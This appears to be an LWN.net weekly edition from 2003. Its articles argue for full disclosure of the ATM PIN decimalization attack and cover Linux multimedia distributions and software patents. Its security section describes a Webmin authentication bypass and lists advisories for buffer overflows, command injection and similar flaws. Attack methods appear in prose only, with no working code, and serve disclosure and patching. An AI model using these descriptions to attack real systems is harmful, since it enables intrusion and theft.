Full disclosure and the banking industry
Back in 1992, an English police officer named John Munden returned from a
vacation to find that a series of ATM withdrawals had cleaned out his bank
account. His complaints to the bank were not received well; they responded
that their systems were secure and only Mr. Munden could have made those
withdrawals. When he persisted, the bank (the Halifax Building Society)
had him prosecuted (and convicted) for fraud. It took four years, and
a great deal of effort by a researcher named Ross Anderson, to shine a
light on Halifax's poor security, and to get Mr. Munden freed on appeal.
Even so, the attitude of the banking industry has changed little;
complaints of "phantom withdrawals" are given little credence, and account
holders often end up footing the bill. (Some countries, including the
U.S., give consumers more protection than others, such as Britain, in this
area).
Given that peoples' money - and freedom - are being staked on the security
of the ATM system, it would be nice to know that this system is truly
secure. But banks, unsurprisingly, are unenthusiastic about opening up
their systems to external review. Mr. Anderson and colleagues have
continued their research into the phantom withdrawal problem, and have
served as expert witnesses in associated court cases. Recently they turned
up something interesting.
The personal ID numbers (PINs) used to verify the person using an ATM card
are kept in a carefully-guarded database. It is not generally possible to
extract a specific PIN directly. Instead, the ATM system operates through
a set of hardware security modules that can give "yes or no" answers for a
given account number and PIN. Thus, it is claimed, even a corrupt insider
would be reduced to guessing to obtain a specific PIN number. The search
space is not that large (10,000 numbers), but it still requires an average
of 5,000 guesses to obtain a single PIN.
Mike Bond and Piotr Zielinski, working with Mr. Anderson, found a
vulnerability in this system; their writeup is available (for now) on the
web in PDF format (also
available here while
Cryptome, which apparently has been broken into, gets back on its feet). By
manipulating a simple "decimalization table" used in the generation of the
PIN from the account number, an attacker can quickly determine which digits
are present in the PIN. Using that information and some additional tricks,
the researchers were able to extract PIN numbers using an average of
15 guesses. An attacker, they conclude, would be able to extract about
7,000 PINs over the course of a half-hour lunch break.
Citibank has responded to this discovery by seeking a gag order to suppress the
disclosure of the vulnerability information. The information, says
Citibank, is confidential and should not be released publicly. This action
immediately had the obvious effect: once word got out, the paper describing
the vulnerability was copied far and wide across the net, beyond any
feasible recall. Even in the modern world, once information gets out, it
is out.
Citibank could certainly argue that it does not want to provide useful
information to those who would attack its systems. On the other hand, the
rising tide of phantom withdrawal cases suggests that some of this
information is in the hands of the Bad Guys already. Could it be that the
banks are really trying to avoid (1) admitting that phantom
withdrawals are a real problem, and (2) undertaking the expensive task
of fixing their systems?
Evidence in the software field consistently suggests that vendors do not
rush out to fix their security problems in the absence of considerable
external pressure to do so. This is especially true if the costs of the
problems can be pushed onto somebody else. The banking industry
needs disclosure of its problems if we are to have any confidence in
its security at all. As with vulnerabilities in the software industry,
banking vulnerabilities should be handled with some care. But the
information has to get out, or the problems will not be fixed in any sort
of timely way. Consider, for example, the uproar the resulted when Matt
Blaze exposed
a vulnerability in master-keyed door locks which, apparently, had been
known to locksmiths (but not fixed) for decades.
The lessons we have learned in the software world are applicable in a much
wider context. Continued defense of our ways of working, including
disclosure of security problems and open review of security-related
systems, is important for our security and freedom.
This is true with regard to our computing systems, and far beyond.
Comments (8 posted)
The State of Multimedia Linux
[This article was contributed by Joe 'Zonker'
Brockmeier]
About three years ago a volunteer project, sparked by Marco Trevisani,
started working on
DeMuDi (the Debian
Multimedia Distribution). The goal of
DeMuDi was to provide a multimedia GNU/Linux distribution. Not just a
distribution with multimedia players and viewers, but a distribution
with tools to author multimedia content. Originally devised for
distribution at the International Computer Music Conference, the project
took on a life of its own after that conference.
According to Guenter Geiger, one of the developers who worked on the
original DeMuDi project and who has been one of the main volunteers
until recently, the project sparked the AGNULA (A GNU/Linux Audio
distribution) project. (Note: The availability of the AGNULA website
leaves much to be desired. It may be easier to get information on AGNULA
using Google's caching feature.) The AGNULA project was started by
Nicola Bernardini. Bernardini, the manager of Centro Tempo Reale in Florence,
delivered a proposal to the European Commission. The EC gave a green
light to the project, and provided a two-year funding package starting
April 1, 2002.
The AGNULA project is coordinated by Tempo Reale and involves research
institutions in Paris, Barcelona, Stockholm and the Free Software
Foundation Europe. The goal of the project is to produce two
distributions, DeMuDi and a Red Hat-based version
called ReHMuDi, as well as a number of multimedia packages. Only free
software is to be used to build these distributions.
Unfortunately, development of the distributions under the AGNULA project
do not seem to be proceeding quite as quickly as some might have hoped.
Trevisani, who was the Technical Coordinator for the AGNULA/DeMuDi
project, spoke
up a few weeks ago on the Debian developer media list
about the problems with DeMuDi as a separate distribution and the need for
a internal Debian multimedia project:
After one year of work and having
reached release 0.9 I definitely think that is time to start a
Debian-Multimedia internal-projects...I'm aware that there is no chance for
the project for growing and lasting in the future if it does not become
quite urgently a Debian internal projects.
Trevisani has stepped down from his position as Technical Coordinator
for the project after one year of work and the release of DeMuDi 0.9.
The position is now being handled by Andrea Glorioso. Glorioso also took
part in the discussion on the Debian developer mailing list, and says
that they're trying to find a good way to cooperate between the AGNULA project and Debian. However, there are some technical hurdles in coordinating packages with Debian, since the stable distribution moves very slowly and the testing and unstable distributions are (by definition) always in a state of flux.
Geiger has also stopped working on DeMuDi and says that he wants to
"concentrate more on pushing the idea within Debian, simply by
maintaining the DeMuDi packages within the Debian framework." Geiger
says that the main problem with DeMuDi is a lack of developers. A glance at
the DeMuDi
developer mailing list archives shows that there's not a lot of
activity on that front.
While some developers are being paid for work related to Linux
multimedia, Geiger says there is little money for creating the
distribution itself. According to Geiger, "the big part of the money is
going into the subprojects...the small part that is left for building
the two distributions is divided equally among DeMuDi and RehMuDi." Both
Geiger and Trevisani have worked on DeMuDi as volunteers.
For now, Geiger says that the he hopes there will be more discussion
within Debian about an internal multimedia project. He also
mentioned that a separate mailing list for discussion of a multimedia
project has been requested. As of yet, there's no official word on the
status of an internal Debian project.
Whether the AGNULA projects will result in a usable multimedia
distribution, or if Trevisani and Geiger will be successful in producing
a viable sub-project within Debian, remains to be seen. If Linux is
going to make any kind of dent in Microsoft's share on the desktop,
we'll definitely need multimedia applications that can compete with the
commercial counterparts for Windows and the Mac OS. There are a number
of applications that are showing promise, but a distribution that
bundles the applications could be a huge boon in luring users away from
proprietary platforms and onto Linux.
Comments (5 posted)
Continuing fun with software patents
The U.S. Patent and Trademark Office continues to amaze with the range of
software technologies that it is willing to patent. Here are a couple of
new ones:
- Interwoven has been awarded patent
#6,505,212 for a "system and method for website development."
What the patent really covers, though, is a revision control
system; the management of web site content is just one possible use
suggested in the patent abstract. This patent covers content
management systems like Zope quite clearly; revision control systems
like CVS could also be threatened, however. (See also: Interwoven's
press release on the patent).
- Amazon, meanwhile, was just given patent
#6,525,747, which covers online discussion systems. This patent
would appear to cover just about any site which allows the posting of
comments. It might be limited somewhat, however, by its reference to
"items offered for sale" as the starting point for discussions.
There is no doubt that copious amounts of prior art can be found for both
of these patents. Your editor first used a revision control system -
accessed with punch cards - over twenty years ago. Web sites allowing
discussions existed before Amazon hit the net, and certainly before 1999,
when the patent was filed.
But prior art does not help address the real problem: the patent office is
allowing companies to try to fence off little bits of the intellectual
landscape without regard to originality or any pretense of promoting any
sort of progress. Increasingly, it is impossible to write any sort of
nontrivial program that does not infringe upon somebody's patent. The only
saving grace is the fact that most of these patents are never enforced.
Otherwise, software development would grind to a halt - at least, in those
countries which allow software patents.
Comments (8 posted)
LWN Update
It's been a little while since we have posted one of these updates. That
is as it should be...better to fill our pages with the stuff you all
really came to read. We'll let you get into this week's hot
security updates shortly, but, first, a word from your sponsor.
The individual subscription count stands at almost exactly 2500; it really
has not changed much in the last couple months. 2500 subscribers will keep
the lights on for now, but that's really not enough to keep things going in
the long term. Somehow we are going to have to find a way to inspire quite
a few more of you to subscribe.
That said, here's a quick heads up: we'll be making a small change to
subscription pricing shortly. Until now, we have encouraged readers to
take out monthly subscriptions for a couple of reasons: we didn't want to
risk going under with a large unfulfilled subscription liability, and we
were doing our best to avoid getting in trouble with our credit card
merchant bank. At this point, we are reasonably confident that we'll
figure this out somehow and find a way to stick around for the long term.
And our new
merchant bank is rather more friendly than the old one was. The monthly
renewals are also costing us a fair amount in processing fees.
So we will soon (within a week or two) implement a discount for longer-term
subscriptions. It won't be huge, but it will reflect the difference in our
costs, and, hopefully, encourage a shift away from the monthly method. An
announcement will go out when the new scheme goes into effect.
Thanks, as always, for supporting LWN.
Comments (21 posted)
Page editor: Jonathan Corbet
Security
Security news
Giving Root to the Web
[This article was contributed by Tom Owen]
These days, pretty much any box with an Ethernet port has a web
administration interface running alongside the command line and that iffy
SNMP agent. Even if you can ignore horrors like the admin password going
through an HTML form and no support for HTTPS, it's unlikely that the web
server running in, say, a cheap switch will have been better tested or
reviewed than miniserv.pl, the perl HTTP server which runs at the core of
Webmin.
Webmin is a popular administration package which provides form-based
access to configuration files for many standard and optional components.
Administrators use a browser and the Webmin forms to manage users DNS zone
changes, driver modules and many other tasks. All the applications are
perl modules, running via CGI under the miniserv.pl web server.
The recent vulnerability report
from the
LAC security lab
suggests that miniserv.pl can be fooled by control characters in a web
authentication string.
It apparently needs the "Enable Password Timeout" option to be set in Webmin,
but that's an option that many cautious admins will choose anyway.
The inevitable
exploit
makes it concrete and easy. It's nicely set up to get a script kiddy going:
a few lines of perl run netcat to fake a single HTTP GET.
It's all simple and transparent except for an artfully crafted base64 string
on the Authorization: header.
The control codes there create a specific session for the default user "admin".
A cookie containing the session ID on a local browser is then all the
attacker needs to use all the Webmin modules.
It's complete server root access with full havoc potential in a very few steps.
A search for "webmin" on Bugtraq
shows a trickle of problems, mostly in the last couple of years, ranging from
local privilege escalation to full remote admin access.
Cross site scripting and other old favorites show up with oddities like
leftover environment variables.
In fact the the system seems more secure than many,
but the consequences of failure are much worse than for ordinary web
applications:
instead of one function or application being compromised, it's the whole
server.
This situation raises a question:
Can it ever be responsible to put a root function on to a web protocol?
This isn't particularly a Webmin issue. The miniserve.pl fault was
promptly fixed in 1.070
but all of those cheap printers, switches and wireless access points are
still booting the firmware they shipped with. We can be sure that this is
a case where absence of reports doesn't mean the holes aren't there.
Despite the potential for trouble, no reduction in web-based
administration, even over the public internet, is
going to happen soon.
It probably won't even begin to happen until someone gets sued for negligence --
it's just too useful, and for remotely-hosted servers it's pretty much
essential.
Just looking at Webmin, the value stands out:
- So many people hate text mode configuration
- Even those who love it acknowledge that systems like Bind are ticklish
to get right by hand:
A display like
this
is not lovely, but it can save you from forgetting the reverse addresses.
- Checklist purchasers need it:
it's a good, demonstrable counterargument to "Linux is impossible to
administer" charges.
So, lots of admins will be keeping Webmin, SWAT and those network boxes.
They've got a lot of the same work to do:
- Turn off unused web administrator systems (and SNMP too.)
Scan to make sure they stay off.
- When it's configurable, standardise on a web administration port to
block unconditionally
at the firewall. Caldera, for example, uses port 1000.
- Printers and switches don't need Internet access.
At the firewall, block the IP range they're in.
- In simple LANs they don't even need a default gateway. 0.0.0.0 is
fine.
- Webmin and others offer IP-based access control.
Turn it on and only include administrators' machines.
- In the longer term, get that VPN on-line.
It's a shame. That fantasy about doing your work from the Internet cafe just
ended.
Web administration is democratic, convenient and inclusive, a huge boon to
admins, and
it'll be hard to give it up.
But the way it looks now, it's hard to believe it can ever be really safe.
Comments (7 posted)
New vulnerabilities
apcupsd - remote root vulnerability and buffer overflows
| Package(s): | apcupsd |
CVE #(s): | CAN-2003-0098
CAN-2003-0099
|
| Created: | February 24, 2003 |
Updated: | April 3, 2003 |
| Description: |
From the MandrakeSoft
advisory:
A remote root vulnerability in slave setups and some buffer overflows in
the network information server code were discovered by the apcupsd
developers. They have been fixed in the latest unstable version, 3.10.5
which contains additional enhancements like USB support, and the latest
stable version, 3.8.6.
There are a few changes that need to be noted, such as the port has changed
from port 7000 to post 3551 for NIS, and the new config only allows access
from the localhost. Users may need to modify their configuration files
appropriately, depending upon their configuration. |
| Alerts: |
|
Comments (none posted)
BitchX - denial of service
| Package(s): | BitchX |
CVE #(s): | |
| Created: | February 20, 2003 |
Updated: | May 26, 2003 |
| Description: |
From this Bugtraq posting:
A denial of service vulnerability exists in BitchX. Sending a malformed
RPL_NAMREPLY numeric 353 causes BitchX to segfault. This problem was
reported to panasync@efnet#bitchx on Jan 30 2003, as of this writing we are
unaware of any patches or workarounds provided by panasync and or any
members of #bitchx |
| Alerts: |
|
Comments (none posted)
shadow-utils: useradd tool creates mail spools with incorrect permissions
| Package(s): | shadow-utils |
CVE #(s): | CAN-2002-1509
|
| Created: | February 20, 2003 |
Updated: | February 27, 2003 |
| Description: |
The shadow-utils package includes programs for converting UNIX password
files to the shadow password format, plus programs for managing user and
group accounts. One of these programs is useradd, which is used to create
or update new user information.
When creating a user account, the version of useradd included in Red Hat
Linux 7.2, 7.3, and 8.0 creates a mailbox file with incorrectly-set group
ownership. Instead of setting the file's group ownership to the 'mail'
group, it is set to the user's primary group.
On systems where other users share the same primary group, this would allow
those users to be able to read and write other user mailboxes. |
| Alerts: |
|
Comments (none posted)
usermin - unauthorized access
| Package(s): | usermin, webmin |
CVE #(s): | |
| Created: | February 24, 2003 |
Updated: | February 27, 2003 |
| Description: |
- From announcement:
"Due to a remotely exploitable security hole being discovered that
effects all previous Webmin releases, version 1.070 is now available
for download from http://www.webmin.com/ and mirror sites. This
problem was reported by Cintia M. Imanishi, but fortunately there
have been no known malicious exploits of it yet. However, all users
should upgrade to 1.070 as soon as possible."
"Also available is Usermin 1.000 which fixes the exact same security
hole. It includes the same File Manager features, as well as support
for IMAP folders and an IMAP inbox in the Read Mail module."
Read this alert for the details. |
| Alerts: |
|
Comments (none posted)
vnc - replay and cookie vulnerabilities
| Package(s): | vnc |
CVE #(s): | CAN-2002-1336
CAN-2002-1511
|
| Created: | February 21, 2003 |
Updated: | May 5, 2003 |
| Description: |
VNC is a tool for providing a remote graphical user interface. Two
vulnerabilities have been found in versions of VNC shipped by Red Hat.
The VNC server acts as an X server, but the script for starting it
generates an MIT X cookie (which is used for X authentication) without
using a strong enough random number generator. This could allow an
attacker to be able to more easily guess the authentication cookie.
The VNC DES authentication scheme is implemented using a challenge-response
architecture, producing a random and different challenge for each
authentication attempt. A bug in the function for generating the random
challenge caused the random seed to get reset to the current time on every
authentication attempt. Therefore, two authentication attempts within the
same second could receive the same challenge. An eavesdropper could
exploit this vulnerability by replaying the response, thereby gaining
authentication.
All users of VNC are advised to upgrade to these erratum packages, which
contain patches to correct these issues. |
| Alerts: |
|
Comments (none posted)
zlib 1.1.4 has buffer overrun
| Package(s): | zlib |
CVE #(s): | CAN-2003-0107
|
| Created: | February 25, 2003 |
Updated: | April 29, 2003 |
| Description: |
From this Bugtraq
posting:
"zlib contains a function called gzprintf(). This is similar in
behaviour to fprintf() except that by default, this function will smash the
stack if called with arguments that expand to more than Z_PRINTF_BUFSIZE
(=4096 by default) bytes." |
| Alerts: |
|
Comments (none posted)
Updated vulnerabilities
Heap corruption vulnerability in at
| Package(s): | at at, sudo, xchat |
CVE #(s): | CAN-2002-0004
|
| Created: | May 20, 2002 |
Updated: | May 15, 2003 |
| Description: |
The at command has a
potentially exploitable heap corruption bug.
(First LWN report: January 17th).
|
| Alerts: |
|
Comments (none posted)
BIND8: Multiple vulnerabilities
Comments (1 posted)
bind buffer overflow vulnerability in DNS resolver libraries
| Package(s): | bind glibc |
CVE #(s): | CAN-2002-0651
CAN-2002-0684
|
| Created: | July 8, 2002 |
Updated: | September 30, 2003 |
| Description: |
The BIND 4.9.8-OW2 patch and BIND 4.9.9 release (and thus 4.9.9-OW1)
include fixes for a libc related vulnerability which does not
affect Linux. Updates from
the Internet Software Consortium (ISC)
are available from here.
No release or branch of Openwall GNU/*/Linux (Owl) is known to be
affected, due to Olaf Kirch's fixes for this problem getting into the
GNU C library more than two years ago.
Unfortunatly that does not mean that Linux systems are not vulnerable.
Similar code, without Olaf Firch's fixes,
is in the glibc getnetbyXXX functions.
These functions are described in the SuSE alert as
"
used by very few applications only, such as ifconfig and ifuser,
which makes exploits less likely."
CERT Advisory: CA-2002-19
Buffer Overflow in Multiple DNS Resolver Libraries
CAN-2002-0651
CAN-2002-0684 |
| Alerts: |
|
Comments (1 posted)
Canna server: exploitable buffer overrun
| Package(s): | canna |
CVE #(s): | CAN-2002-1158
CAN-2002-1159
|
| Created: | December 10, 2002 |
Updated: | September 30, 2003 |
| Description: |
Canna is a kana-kanji conversion server which is necessary for Japanese
language character input.
A buffer overflow bug in the Canna server up to and including version 3.5b2
allows a local user to gain the privileges of the user 'bin' which could
lead to further exploits. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2002-1158 to this issue.
A lack of validation of requests has been found that affects Canna version
3.6 and earlier. A malicious remote user could exploit this vulnerability
to leak information, or cause a denial of service attack. (CAN-2002-1159)
See also
http://canna.sourceforge.jp/sec/Canna-2002-01.txt
CAN-2002-1158
CAN-2002-1159 |
| Alerts: |
|
Comments (none posted)
CVS - exploitable double-free bug in the CVS server
| Package(s): | cvs |
CVE #(s): | CAN-2003-0015
|
| Created: | January 20, 2003 |
Updated: | April 7, 2003 |
| Description: |
CVS is a version control system frequently used to manage source code
repositories. During an audit of the CVS sources, Stefan Esser
discovered an exploitable double-free bug in the CVS server.
On servers which are configured to allow anonymous read-only access, this
bug could be used by anonymous users to gain write privileges. Users with
CVS write privileges can then use the Update-prog and Checkin-prog features
to execute arbitrary commands on the server.
All users of CVS are advised to upgrade to erratum packages which contain
patches to correct the double-free bug.
See also this CERT advisory |
| Alerts: |
|
Comments (none posted)
dhcp3 - ignored counter boundary
| Package(s): | dhcp3 |
CVE #(s): | CAN-2003-0039
|
| Created: | January 28, 2003 |
Updated: | April 4, 2003 |
| Description: |
Florian Lohoff discovered a bug in the dhcrelay causing it to send a
continuing packet storm towards the configured DHCP server(s) in case
of a malicious BOOTP packet, such as sent from buggy Cisco switches.
When the dhcp-relay receives a BOOTP request it forwards the request
to the DHCP server using the broadcast MAC address ff:ff:ff:ff:ff:ff
which causes the network interface to reflect the packet back into the
socket. To prevent loops the dhcrelay checks whether the
relay-address is its own, in which case the packet would be dropped.
In combination with a missing upper boundary for the hop counter an
attacker can force the dhcp-relay to send a continuing packet storm
towards the configured dhcp server(s).
This patch introduces a new commandline switch ``-c maxcount'' and
people are advised to start the dhcp-relay with ``dhcrelay -c 10''
or a smaller number, which will only create that many packets.
The dhcrelay program from the ``dhcp'' package does not seem to be
affected since DHCP packets are dropped if they were apparently
relayed already. |
| Alerts: |
|
Comments (none posted)
dvips: command execution vulnerability
| Package(s): | dvips |
CVE #(s): | CAN-2002-0836
|
| Created: | October 16, 2002 |
Updated: | June 10, 2003 |
| Description: |
The dvips utility uses the system() function improperly when managing fonts. An attacker who can craft the right sort of print job can use this vulnerability to execute commands under the UID used by the print system. |
| Alerts: |
|
Comments (none posted)
Filename disclosure vulnerability in fam
| Package(s): | fam |
CVE #(s): | CAN-2002-0875
|
| Created: | August 19, 2002 |
Updated: | January 5, 2005 |
| Description: |
"fam" (file alteration monitor) watches files and directories for changes and lets interested applications know when something happens. This package has a flaw in its group handling that blocks some legitimate operations while, at the same time, exposing the names of files that should otherwise be invisible. |
| Alerts: |
|
Comments (none posted)
fetchmail: buffer overflow
| Package(s): | fetchmail |
CVE #(s): | CAN-2002-1365
|
| Created: | December 17, 2002 |
Updated: | October 20, 2003 |
| Description: |
Versions of fetchmail prior to 6.2.0 have (yet another) buffer overflow vulnerability which can be exploited remotely via a suitably crafted message. See this advisory for details. |
| Alerts: |
|
Comments (3 posted)
GNU fileutils race condition
| Package(s): | fileutils ucdsnmp |
CVE #(s): | CAN-2002-0435
|
| Created: | May 20, 2002 |
Updated: | May 16, 2003 |
| Description: |
A race
condition in rm may cause the root user to delete the whole filesystem.
The problem exists in the version of rm in
fileutils
4.1 stable and 4.1.6 development version. A patch
is available.
(First LWN
report: May 2).
|
| Alerts: |
|
Comments (none posted)
Potential remote root exploit in glibc
| Package(s): | glibc |
CVE #(s): | CAN-2002-0391
|
| Created: | August 14, 2002 |
Updated: | June 29, 2003 |
| Description: |
Felix von Leitner, discovered a
potential division by zero bug in
code derived from the SunRPC library which is used in glibc.This bug could be
exploited to gain unauthorized root access to software linking to glibc.
Updating as soon as practical is a good idea.
Because SunRPC-derived XDR libraries are used by a variety of vendors in a variety of applications, this defect may lead to a number of differing security problems. Exploiting this vulnerability will lead to denial of service, execution of arbitrary code, or the disclosure of sensitive information.
CERT/CC Vulnerability Note VU#192995 Integer
overflow in xdr_array() function when deserializing the XDR stream
|
| Alerts: |
|
Comments (none posted)
glibc: DNS stub resolvers contain buffer overflow vulnerability
| Package(s): | glibc |
CVE #(s): | CAN-2002-1146
|
| Created: | November 7, 2002 |
Updated: | February 5, 2004 |
| Description: |
DNS stub resolvers from multiple vendors contain a buffer overflow
vulnerability. The impact of this vulnerability appears to be limited to
denial of service. (See CERT Vulnerability Note
VU#738331)
The BIND 4 and BIND 8.2.x stub resolver libraries, and other libraries such
as glibc 2.2.5 and earlier, libc, and libresolv, uses the maximum buffer
size instead of the actual size when processing a DNS response, which
causes the stub resolvers to read past the actual boundary ("read buffer
overflow"), allowing remote attackers to cause a denial of service
(crash).
|
| Alerts: |
|
Comments (none posted)
hypermail - buffer overflows
| Package(s): | hypermail |
CVE #(s): | CAN-2003-0057
|
| Created: | February 11, 2003 |
Updated: | February 27, 2003 |
| Description: |
Ulf Harnhammar discovered two problems in hypermail, a program to
create HTML archives of mailing lists.
An attacker could craft a long filename for an attachment that would
overflow two buffers when a certain option for interactive use was
given, opening the possibility to inject arbitrary code. This code
would then be executed under the user id hypermail runs as, mostly as
a local user. Automatic and silent use of hypermail does not seem to
be affected.
The CGI program mail, which is not installed by the Debian package,
does a reverse look-up of the user's IP number and copies the
resulting hostname into a fixed-size buffer. A specially crafted DNS
reply could overflow this buffer, opening the program to an exploit. |
| Alerts: |
|
Comments (none posted)
IM: creates temporary files insecurely
| Package(s): | im |
CVE #(s): | CAN-2002-1395
|
| Created: | December 3, 2002 |
Updated: | March 6, 2003 |
| Description: |
Tatsuya Kinoshita discovered that IM, which contains interface
commands and Perl libraries for E-mail and NetNews, creates temporary
files insecurely.
- The impwagent program creates a temporary directory in an insecure
manner in /tmp using predictable directory names without checking
the return code of mkdir, so it's possible to seize a permission
of the temporary directory by local access as another user.
- The immknmz program creates a temporary file in an insecure manner
in /tmp using a predictable filename, so an attacker with local
access can easily create and overwrite files as another user.
|
| Alerts: |
|
Comments (none posted)
IMP - SQL injection vulnerability
| Package(s): | imp |
CVE #(s): | CAN-2003-0025
|
| Created: | January 15, 2003 |
Updated: | July 8, 2003 |
| Description: |
The IMP IMAP server, versions 2.2.8 and prior, is vulnerable to SQL
injection; see this advisory for details.
Version 3.x is not vulnerable to this problem. |
| Alerts: |
|
Comments (1 posted)
KDE - command parameter quoting problems
| Package(s): | kde |
CVE #(s): | CAN-2002-1393
|
| Created: | December 23, 2002 |
Updated: | February 21, 2003 |
| Description: |
In some instances, KDE (versions 2 and 3) fails to properly quote parameters of instructions
passed to a command shell for execution.
These parameters may incorporate data such as URLs, filenames and e-mail
addresses, and this data may be provided remotely to a victim in an e-mail,
a webpage or files on a network filesystem or other untrusted source.
By carefully crafting such data an attacker might be able to execute
arbitary commands on a vulnerable sytem using the victim's account and
privileges.
See this announcement for more details. |
| Alerts: |
|
Comments (none posted)
kdelibs: Vulnerabilities in KIO subsystem support
| Package(s): | kdelibs |
CVE #(s): | CAN-2002-1281
CAN-2002-1282
|
| Created: | November 22, 2002 |
Updated: | March 14, 2003 |
| Description: |
Vulnerabilities were discovered in the KIO subsystem support for various
network protocols. The implementation of the rlogin protocol affects all
KDE versions from 2.1 up to 3.0.4, while the flawed implementation of the
telnet protocol only affects KDE 2.x. They allow a carefully crafted URL
in an HTML page, HTML email, or other KIO-enabled application to execute
arbitrary commands as the victim with their privilege.
The KDE team provided a patch for KDE3 which has been applied in these
packages. No patch was provided for KDE2, however the KDE team recommends
disabling both the rlogin and telnet KIO protocols. This can be
accomplished by removing, as root, the following files:
/usr/share/services/telnet.protocol and
/usr/share/services/rlogin.protocol.
If either file also exists in a user's ~/.kde/share/services directory,
they should likewise be removed.
See also:
http://www.kde.org/info/security/advisory-20021111-1.txt |
| Alerts: |
|
Comments (none posted)
kernel-utils: setuid vulnerability
| Package(s): | kernel-utils |
CVE #(s): | CAN-2003-0019
|
| Created: | February 7, 2003 |
Updated: | January 21, 2005 |
| Description: |
The kernel-utils package contains several utilities that can be used to
control the kernel or machine hardware. In Red Hat Linux 8.0 this package
contains user mode linux (UML) utilities.
The uml_net utility in kernel-utils packages with Red Hat Linux 8.0 was
incorrectly shipped setuid root. This could allow local users to control
certain network interfaces, add and remove arp entries and routes, and put
interfaces in and out of promiscuous mode.
All users of the kernel-utils package should update to these packages that
contain a version of uml_net that is not setuid root.
Alternatively, as a work-around to this vulnerability issue the following
command as root:
chmod -s /usr/bin/uml_net |
| Alerts: |
|
Comments (none posted)
krb5 - vulnerability in Kerberos ftp client
| Package(s): | krb5 ftp netkit |
CVE #(s): | CAN-2003-0041
|
| Created: | January 31, 2003 |
Updated: | February 21, 2003 |
| Description: |
Kerberos is a network authentication system.
A problem has been found in the Kerberos ftp client. When retrieving a
file with a filename beginning with a pipe character, the ftp client will
pass the filename to the command shell in a system() call. This could
allow a malicious ftp server to write to files outside of the current
directory or execute commands as the user running the ftp client.
The Kerberos ftp client runs as the default ftp client when the Kerberos
package krb5-workstation is installed on a Red Hat Linux distribution. |
| Alerts: |
|
Comments (none posted)
libmcrypt: buffer overflows and memory exhaustion
| Package(s): | libmcrypt |
CVE #(s): | CAN-2003-0031
CAN-2003-0032
|
| Created: | January 6, 2003 |
Updated: | February 27, 2003 |
| Description: |
libmcrypt versions prior to 2.5.5 contain a number of buffer overflow
vulnerabilities that stem from improper or lacking input validation. By
passing a longer than expected input to a number of functions (multiple
functions are affected) the user can successful make libmcrypt crash.
Another vulnerability is due to the way libmcrypt loads algorithms via
libtool. When the algorithms are loaded dynamically the each time the
algorithm is loaded a small (few kilobytes) of memory are leaked. In a
persistant enviroment (web server) this could lead to a memory exhaustion
attack that will exhaust all avaliable memory by launching repeated
requests at an application utilizing the mcrypt library. |
| Alerts: |
|
Comments (none posted)
libpng, libpng3: buffer overflow
| Package(s): | libpng, libpng3 |
CVE #(s): | CAN-2002-1363
|
| Created: | December 19, 2002 |
Updated: | July 14, 2004 |
| Description: |
Glenn Randers-Pehrson discovered a problem in connection with 16-bit
samples from libpng, an interface for reading and writing PNG
(Portable Network Graphics) format files. The starting offsets for
the loops are calculated incorrectly which causes a buffer overrun
beyond the beginning of the row buffer. |
| Alerts: |
|
Comments (none posted)
lynx: CRLF injection vulnerability
| Package(s): | lynx |
CVE #(s): | CAN-2002-1405
|
| Created: | November 19, 2002 |
Updated: | September 30, 2003 |
| Description: |
If lynx is given a url with some special characters on the command line, it
will include faked headers in the HTTP query. This feature can be used to
force scripts (that use Lynx for downloading files) to access the wrong
site on a web server with multiple virtual hosts.
CAN-2002-1405 |
| Alerts: |
|
Comments (none posted)
mailman: mailman 2.1 cross site scripting vulnerabilities
| Package(s): | mailman |
CVE #(s): | |
| Created: | February 17, 2003 |
Updated: | February 19, 2003 |
| Description: |
The email variable and the default error page in mailman 2.1 contains
cross site scripting vulnerabilities.
Read the the full advisory for the details.
|
| Alerts: |
|
Comments (none posted)
perl-MailTools: remote command execution
| Package(s): | MailTools |
CVE #(s): | CAN-2002-1271
|
| Created: | November 5, 2002 |
Updated: | September 19, 2003 |
| Description: |
The SuSE Security Team reviewed critical Perl modules, including the
Mail::Mailer package. This package contains a security hole which allows
remote attackers to execute arbitrary commands in certain circumstances.
This is due to the usage of mailx as default mailer which allows commands
to be embedded in the mail body.
Note that mail processing programs which use this package can be affected by this vulnerability; in particular, SpamAssassin is vulnerable if you use the -r or -w flags.
|
| Alerts: |
|
Comments (none posted)
micq: Denial of service
| Package(s): | micq |
CVE #(s): | |
| Created: | December 13, 2002 |
Updated: | April 24, 2003 |
| Description: |
Rüdiger Kuhlmann, upstream developer of mICQ, a text based ICQ client,
discovered a problem in mICQ. Receiving certain ICQ message types
that do not contain the required 0xFE seperator causes all versions to
crash. |
| Alerts: |
|
Comments (none posted)
mod_dav: Apache mod_dav module format string vulnerability
| Package(s): | mod_dav |
CVE #(s): | |
| Created: | February 17, 2003 |
Updated: | February 19, 2003 |
| Description: |
The Apache mod_dav module contains a format string vulnerability in the
"ap_log_rerror()" function. |
| Alerts: |
(No alerts in the database for this vulnerability)
|
Comments (1 posted)
mod_php - buffer overflow
| Package(s): | mod_php php |
CVE #(s): | CAN-2002-1396
|
| Created: | January 13, 2003 |
Updated: | February 20, 2003 |
| Description: |
The wordwrap() function on user-supplied input may allow a
specially-crafted input to overflow the allocated buffer and overwrite the
heap. There are no known exploits, but an exploit is theoretically possible.
Read the full advisory at
http://marc.theaimsgroup.com/?l=bugtraq&m=104102689503192&w=2 |
| Alerts: |
|
Comments (none posted)
MySQL - double free vulnerability
| Package(s): | mysql |
CVE #(s): | CAN-2003-0073
|
| Created: | January 29, 2003 |
Updated: | February 21, 2003 |
| Description: |
MySQL 3.23.55 fixes a double-free vulnerability which allows a hostile
client to crash the server process. Logging into the server is necessary
before this vulnerability can be exploited. |
| Alerts: |
|
Comments (none posted)
MySQL: multiple vulnerabilities
| Package(s): | mysql |
CVE #(s): | |
| Created: | December 13, 2002 |
Updated: | April 10, 2003 |
| Description: |
The MySQL database server has several buffer overflow and integer bounds checking vulnerabilities which can lead to denial of service attacks, and, possibily, remote code execution. See this e-matters advisory for details. Version 3.23.54 fixes the problems. |
| Alerts: |
|
Comments (none posted)
nethack: buffer overflow
| Package(s): | nethack, slashem, falconseye |
CVE #(s): | CAN-2003-0358
CAN-2003-0359
|
| Created: | February 18, 2003 |
Updated: | July 15, 2003 |
| Description: |
Overflowing a buffer in nethack may lead to privilege escalation to games
uid.
Read the the full advisory for the details.
Note that falconseye does not contain the file permission error
CAN-2003-0359 which affected some other nethack packages. |
| Alerts: |
|
Comments (none posted)
net-snmp: denial of service vulnerability
| Package(s): | net-snmp |
